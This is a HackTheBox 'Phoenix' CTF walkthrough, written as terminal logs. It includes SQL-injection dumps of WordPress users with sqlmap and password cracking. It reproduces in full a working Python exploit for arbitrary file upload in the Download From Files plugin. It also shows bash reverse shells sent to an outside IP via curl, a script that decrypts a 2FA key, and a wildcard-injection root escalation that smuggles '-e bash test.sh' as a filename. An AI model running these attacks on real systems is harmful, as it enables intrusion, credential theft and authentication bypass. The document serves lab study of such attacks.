HackTheBox – Phoenix Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap –A 10.10.11.149
Click on details -> click on Go to Blog.
https://phoenix.htb/?post_type=post
Now click on Forums.
https://phoenix.htb/forum/members/
┌──(root㉿kali)-[/home/kali/Downloads]
└─# wpscan –url https://phoenix.htb/ –disable-tls-checks –enumerate u
https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
┌──(root㉿kali)-[/home/kali/Downloads]
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap –url https://phoenix.htb/forum/?subscribe_topic=1 –level 3 –risk 3 –batch -DBMS MySQL -dbs
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap –url https://phoenix.htb/forum/?subscribe_topic=1 –level 3 –risk 3 –batch -DBMS MySQL -D wordpress –tables
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap –url https://phoenix.htb/forum/?subscribe_topic=1 –level 3 –risk 3 –batch -DBMS MySQL -D wordpress -T wp_users –columns
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap –url https://phoenix.htb/forum/?subscribe_topic=1 –level 3 –risk 3 –batch -DBMS MySQL -D wordpress -T wp_users -C user_login,user_pass –dump
┌──(root㉿kali)-[/home/kali/Downloads]
└─# john hash –wordlist=rockyou.txt
We get the cred
superphoenix
https://www.exploit-db.com/raw/50287
Content:
# Exploit Title: WordPress Plugin Download From Files 1.48 – Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)
import os.path
from os import path
import json
import requests
import sys
def print_banner():
print(“Download From Files <= 1.48 – Arbitrary File Upload”)
print(“Author -> spacehen (www.github.com/spacehen)”)
def print_usage():
print(“Usage: python3 exploit.py [target url] [php file]”)
print(“Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)”)
def vuln_check(uri):
response = requests.get(uri, verify=False)
raw = response.text
if (“Sikeres” in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = ‘download_from_files_617_fileupload’
admin = ‘/wp-admin/admin-ajax.php’;
uri = base + admin + ‘?action=’ + ajax_action ;
check = vuln_check(uri);
if(check == False):
print(“(*) Target not vulnerable!”);
sys.exit(1)
if( path.isfile(file_path) == False):
print(“(*) Invalid file!”)
sys.exit(1)
files = {‘files[]’ : open(file_path)}
data = {
“allowExt” : “php4,phtml”,
“filesName” : “files”,
“maxSize” : “1000”,
“uploadDir” : “.”
}
print(“Uploading Shell…”);
response = requests.post(uri, files=files, data=data, verify=False)
file_name = path.basename(file_path)
if(“ok” in response.text):
print(“Shell Uploaded!”)
if(base[-1] != ‘/’):
base += ‘/’
print(base + “wp-admin/” + file_name);
else:
print(“Shell Upload Failed”)
sys.exit(1)
main()
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat shell.phtml
┌──(root㉿kali)-[/home/kali/Downloads]
└─# python3 exploit.py https://phoenix.htb/ shell.phtml
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 1234
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl -k https://phoenix.htb/wp-admin/shell.phtml –data-urlencode ‘cmd=bash -c “bash -i >& /dev/tcp/10.10.14.102/1234 0>&1″‘
bash-5.0$ cd /opt
bash-5.0$ ls –lrt
bash-5.0$ cd wordpress
GET OPT KEY
we find there is a 2FA auth in /wp-admin login page, we try to figure it out how to bypass it, or just get the OTP key:
and we found encrypt and decrypt functions from the source of that miniorange plugin at handler/twofa/two_fa_utility.php
then We can grab the wordpress login from the wp-config.php file:
bash-5.0$ cd ..
bash-5.0$ cat wp-config.php
Password: <++32%himself%FIRM%section%32++>
then connect to mysql to get more information:
bash-5.0$ script /dev/null -c bash
bash-5.0$ mysql -uwordpress –p
Enter password: <++32%himself%FIRM%section%32++>
mysql> show databases;
mysql> use wordpress;
mysql> select meta_value from wp_usermeta WHERE meta_key IN (‘mo2f_gauth_key’);
mysql> select meta_value from wp_usermeta WHERE meta_key IN (‘mo2f_get_auth_rnd_string’);
and then easily write an decrypt exp php file to get the key:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat epp.php
Content:
<?php
function decrypt_data($data, $key) {
$c = base64_decode($data);
$ivlen = openssl_cipher_iv_length($cipher=”AES-128-CBC”);
$iv = substr($c, 0, $ivlen);
$hmac = substr($c, $ivlen, $sha2len=32);
$ciphertext_raw = substr($c, $ivlen+$sha2len);
$original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);
$calcmac = hash_hmac(‘sha256’, $ciphertext_raw, $key, $as_binary=true);
return $original_plaintext;
}
echo decrypt_data(“qGEPwI6RQBxF4aXM6PVuriofiwCH4mjc4ZjO3jWN5gDDX5MzLHTfDk3tRGK7vwkkTbAjoxNfqFeMjJZoSI5yPF25Hd5b8lSaF/Dpc6WMBTA=”,”kHHxxX3f”);
?>
┌──(root㉿kali)-[/home/kali/Downloads]
└─# php epp.php
bash-5.0$ cd /etc/pam.d
bash-5.0$ ls
We can completely bypass the 2FA by renaming the plugin over at /opt/wordpress/ but it doesn’t get us much further than we already are.
Instead back to using SSH, we can look into bypassing the 2FA completely (for ssh this time, not wordpress), in the /etc/pam.d/ssh config, we see reference to an accessfile:
read more about it:
https://manpages.ubuntu.com/manpages/bionic/man8/pam_google_authenticator.8.html
bash-5.0$ cat /etc/security/access-local.conf
We need to connect from an IP on the 10.11.2.13/24 subnet, which we can’t do from our machine or locally from the other machine. so we use ssh command in the wp_user shell:
We finally SSH over to the box, reusing editor‘s password:
bash-5.0$ ssh editor@10.11.12.13
Password: superphoenix
-bash-5.0$ id
-bash-5.0$ cd /home
-bash-5.0$ ls –lrt
-bash-5.0$ cd editor
-bash-5.0$ cat user.txt
-bash-5.0$ cd /dev/shm
-bash-5.0$ find /usr/local/bin/ -perm -o=x -type f 2>/dev/null
-bash-5.0$ file /usr/local/bin/cron.sh.x
https://gtfobins.github.io/gtfobins/rsync/
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 443
-bash-5.0$ cd /backups
-bash-5.0$ file /usr/local/bin/cron.sh.x
-bash-5.0$ cd /usr/local/bin
-bash-5.0$ ./cron.sh.x
And in another session on pspy we can see the hits.
-bash-5.0$ echo -e ‘#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.102/443 0>&1’ > test.sh; touch — ‘-e bash test.sh’
-bash-5.0$ ls –la
After 3 minute we get the root shell.